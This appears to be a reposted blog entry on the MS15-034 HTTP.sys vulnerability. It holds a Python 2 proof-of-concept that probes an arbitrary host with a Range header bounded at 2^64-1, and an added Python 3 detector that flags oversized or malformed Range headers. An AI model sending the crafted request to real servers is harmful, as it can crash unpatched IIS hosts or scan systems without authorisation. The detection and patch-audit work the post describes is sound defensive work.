  • HTTP.sys remote code execution vulnerability

    A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys); it is triggered when HTTP.sys incorrectly parses a specially crafted HTTP request. An attacker who successfully exploits the vulnerability can execute arbitrary code in the context of the System account.

    Official documentation: https://technet.microsoft.com/zh-cn/library/security/MS15-034

    POC (Python 2):

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # MS15-034 patch-status check (Python 2). A plain request first confirms the
    # target answers as IIS; a second request carries a Range header whose upper
    # bound is 2^64-1, and the status text in the reply is used to classify the host.

    import socket

    ipAddr = raw_input("Please set your target:")
    hexAllFfff = "18446744073709551615"   # 0xFFFFFFFFFFFFFFFF written in decimal
    req1 = "GET / HTTP/1.0\r\n\r\n"
    req = ("GET /  HTTP/1.1\r\n"
           "Host: stuff\r\n"
           "Range: bytes=0-" + hexAllFfff + "\r\n"
           "\r\n")

    print "[*] Audit Started"

    try:
        # Request 1: fingerprint the server from its banner.
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ipAddr, 80))
        client_socket.send(req1)
        boringResp = client_socket.recv(1024)
        if "Microsoft" not in boringResp:
            print "[*] Not IIS"
            exit(0)
        client_socket.close()
        # Request 2: the oversized Range header; only the status line matters.
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ipAddr, 80))
        client_socket.send(req)
        goodResp = client_socket.recv(1024)
        if "Requested Range Not Satisfiable" in goodResp:
            print "[!!] Looks VULN"
        elif " The request has an invalid header name" in goodResp:
            print "[*] Looks Patched"
        else:
            print "[*] Unexpected response, cannot discern patch status"
        client_socket.close()
    except Exception, e:
        print e
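    The probe above relies on a Range header whose upper bound is 18446744073709551615 (2^64-1), far beyond any real resource size. For a defender, the same observation gives a cheap detection heuristic for a reverse proxy, WAF plugin or request-log scanner: parse the Range header and flag byte ranges whose bounds are absurdly large or that do not parse at all. The following Python 3 code is an added example and is not part of the original post; the MAX_BOUND cutoff (2^32), the request dictionaries and the sample traffic in SAMPLE_REQUESTS are all constructed assumptions for illustration.

```python
"""Heuristic inspection of HTTP Range headers (added example, not from the post)."""
import re

UINT64_MAX = 18446744073709551615   # upper bound used by the public MS15-034 probe
MAX_BOUND = 2 ** 32                 # assumed cutoff; tune to the largest file you serve

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(value):
    """Parse a 'Range: bytes=...' value into a list of (start, end) tuples.

    start or end is None for an open-ended ('500-') or suffix ('-500') range.
    Raises ValueError for anything that is not a syntactically valid byte-range set.
    """
    unit, sep, spec = value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("not a byte-range set: %r" % value)
    ranges = []
    for part in spec.split(","):
        m = _RANGE_SPEC.match(part.strip())
        if not m:
            raise ValueError("malformed range spec: %r" % part)
        start, end = m.group(1), m.group(2)
        if not start and not end:
            raise ValueError("empty range spec: %r" % part)
        ranges.append((int(start) if start else None, int(end) if end else None))
    return ranges


def range_header_risk(value, max_bound=MAX_BOUND):
    """Classify a Range header value as 'ok', 'malformed' or 'oversized'."""
    try:
        ranges = parse_byte_ranges(value)
    except ValueError:
        return "malformed"
    for start, end in ranges:
        for bound in (start, end):
            if bound is not None and bound > max_bound:
                return "oversized"
    return "ok"


# Constructed sample traffic (hypothetical, not real captures).
SAMPLE_REQUESTS = [
    {"src": "198.51.100.10", "path": "/big.iso", "headers": {"Range": "bytes=0-1048575"}},
    {"src": "198.51.100.11", "path": "/", "headers": {"Range": "bytes=0-%d" % UINT64_MAX}},
    {"src": "198.51.100.12", "path": "/index.html", "headers": {}},
    {"src": "198.51.100.13", "path": "/a.txt", "headers": {"range": "bytes=foo"}},
]


def scan_requests(requests, max_bound=MAX_BOUND):
    """Return (src, path, verdict) for each request whose Range header is not 'ok'."""
    findings = []
    for req in requests:
        # Header names are case-insensitive, so normalise before the lookup.
        headers = {k.lower(): v for k, v in req["headers"].items()}
        value = headers.get("range")
        if value is None:
            continue
        verdict = range_header_risk(value, max_bound)
        if verdict != "ok":
            findings.append((req["src"], req["path"], verdict))
    return findings


if __name__ == "__main__":
    for src, path, verdict in scan_requests(SAMPLE_REQUESTS):
        print("%s %s -> %s" % (src, path, verdict))
```

    Run stand-alone, the script reports the request carrying the 2^64-1 bound as "oversized" and the unparsable one as "malformed", while the ordinary 1 MiB range passes. A flagged request is a signal for alerting and blocking at the edge; it is not itself proof that the host behind it is unpatched, which the vendor update for MS15-034 is the actual fix for.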
  • Original post: https://www.cnblogs.com/panisme/p/9222385.html